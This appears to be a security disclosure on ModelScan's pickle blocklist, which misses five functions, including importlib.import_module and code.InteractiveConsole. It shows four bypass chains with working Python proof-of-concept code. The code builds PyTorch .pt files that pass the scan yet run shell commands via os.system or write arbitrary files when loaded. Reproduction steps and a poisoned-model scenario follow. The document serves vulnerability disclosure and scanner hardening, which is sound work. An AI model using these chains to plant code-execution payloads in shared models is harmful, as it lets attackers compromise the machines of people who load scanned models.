ModelScan Blocklist Bypass - PyTorch .pt Models (4 Independent Chains)
Summary
ModelScan's unsafe_globals blocklist has systemic gaps allowing arbitrary code execution via crafted PyTorch .pt model files that scan clean. Four independent bypass chains are demonstrated, each requiring a different blocklist addition to fix.
Affected Version
ModelScan <= 0.8.8 (latest as of 2026-03-09)
Vulnerability Details
ModelScan's pickle scanner (`modelscan/tools/picklescanner.py`) extracts GLOBAL/INST/STACK_GLOBAL opcodes and checks them against `unsafe_globals` in `settings.py`. The blocklist covers `os`, `subprocess`, `builtins.eval`, `builtins.exec`, `operator.attrgetter`, etc., but misses 5 critical modules/functions that chain to full RCE:
| Missing Entry | Why It's Dangerous |
|---|---|
| `importlib.import_module` | Imports any blocked module (`os`, `subprocess`, etc.) at runtime |
| `operator.methodcaller` | Calls any method on any object; chains with imported modules |
| `code.InteractiveConsole` | Executes arbitrary Python source code |
| `io.open` | Arbitrary file creation/overwrite |
| `codecs.open` | Arbitrary file creation/overwrite |
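To make the check concrete, the sketch below (a hypothetical payload class, not the contents of poc.py) prints the module/name pairs an opcode-level scan sees. A conventional payload reducing to `builtins.eval` exposes a blocked global, whereas the chains in the next section reference only the missing entries above and therefore scan clean.

```python
# Minimal sketch: enumerate the globals a pickle references, which is roughly
# what ModelScan compares against unsafe_globals. Payload is hypothetical.
import pickle
import pickletools

class FlaggedPayload:
    def __reduce__(self):
        # Reduces to builtins.eval, which the blocklist does cover.
        return (eval, ("1 + 1",))

data = pickle.dumps(FlaggedPayload(), protocol=3)  # protocol 3 still emits GLOBAL
for opcode, arg, _pos in pickletools.genops(data):
    if opcode.name in ("GLOBAL", "STACK_GLOBAL", "INST"):
        print(opcode.name, arg)  # prints: GLOBAL builtins eval
```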
Exploit Chains
Chain 1: importlib + methodcaller (Full RCE, 132 bytes)
`operator.methodcaller('system', cmd)(importlib.import_module('os'))`
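As a rough illustration, a payload for this chain could be embedded in a .pt file via `__reduce__`; the command, class names, and output file below are placeholders, and the actual poc.py may build the pickle differently (e.g. from raw opcodes):

```python
# Sketch: the resulting pickle references only importlib.import_module and
# operator.methodcaller, neither of which is in unsafe_globals.
import importlib
import operator
import torch

CMD = "echo chain-1"  # placeholder command

class _ImportOS:
    def __reduce__(self):
        # Unpickles to the os module without a direct GLOBAL reference to "os".
        return (importlib.import_module, ("os",))

class Chain1:
    def __reduce__(self):
        # methodcaller('system', CMD) is itself picklable, so the callable slot
        # of the reduce tuple also avoids any blocked global.
        return (operator.methodcaller("system", CMD), (_ImportOS(),))

torch.save(Chain1(), "chain1.pt")
# torch.load("chain1.pt", weights_only=False) would run CMD via os.system.
```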
Chain 2: code.InteractiveConsole + methodcaller (Full RCE, 150 bytes)
`operator.methodcaller('push', 'import os; os.system(cmd)')(code.InteractiveConsole())`
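A comparable sketch for this chain, again with placeholder names and a benign command; here the methodcaller drives `InteractiveConsole.push()`, which compiles and runs a complete source line immediately:

```python
import code
import operator
import torch

SRC = "import os; os.system('echo chain-2')"  # placeholder source line

class _Console:
    def __reduce__(self):
        # Unpickles to a fresh InteractiveConsole instance.
        return (code.InteractiveConsole, ())

class Chain2:
    def __reduce__(self):
        return (operator.methodcaller("push", SRC), (_Console(),))

torch.save(Chain2(), "chain2.pt")
# torch.load("chain2.pt", weights_only=False) executes SRC inside the console.
```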
Chain 3: io.open (Arbitrary file write, 60 bytes)
`io.open('/path/to/file', 'w')`
Chain 4: codecs.open (Arbitrary file write, 64 bytes)
`codecs.open('/path/to/file', 'w')`
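Chains 3 and 4 differ only in which open function the pickle references; a combined sketch with placeholder paths (the real poc.py targets may differ):

```python
import codecs
import io
import torch

class Chain3:
    def __reduce__(self):
        # Unpickling calls io.open(path, "w"), creating/truncating the path.
        return (io.open, ("/tmp/chain3_was_here", "w"))

class Chain4:
    def __reduce__(self):
        # Same effect via codecs.open, which is also absent from the blocklist.
        return (codecs.open, ("/tmp/chain4_was_here", "w"))

torch.save(Chain3(), "chain3.pt")
torch.save(Chain4(), "chain4.pt")
# Loading either file with weights_only=False creates/overwrites its target path.
```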
Reproduction
pip install torch modelscan
python poc.py
Expected output:
- ModelScan reports "No issues found" for all 4 malicious .pt files
- All 4 chains execute their payload (command execution or file write) when loaded via `torch.load(file, weights_only=False)`
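For a single chain, the end-to-end check could look like the sketch below; the file name is a placeholder and the `modelscan -p` invocation is an assumption about how the scan is driven (poc.py's exact steps are not reproduced here):

```python
import subprocess
import torch

# 1. Scan the crafted file -- expected to report no issues.
subprocess.run(["modelscan", "-p", "chain1.pt"], check=False)

# 2. Load it the way a typical inference script would -- expected to execute
#    the embedded payload despite the clean scan.
torch.load("chain1.pt", weights_only=False)
```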
Impact
An attacker publishes a malicious PyTorch model on HuggingFace or any model registry. ModelScan (the safety scanner recommended by Protect AI / Palo Alto Networks) scans the file and reports it as safe. When a victim loads the model, arbitrary code executes on their machine.
This bypasses the primary defense that ML engineers rely on to validate model file safety before loading untrusted models.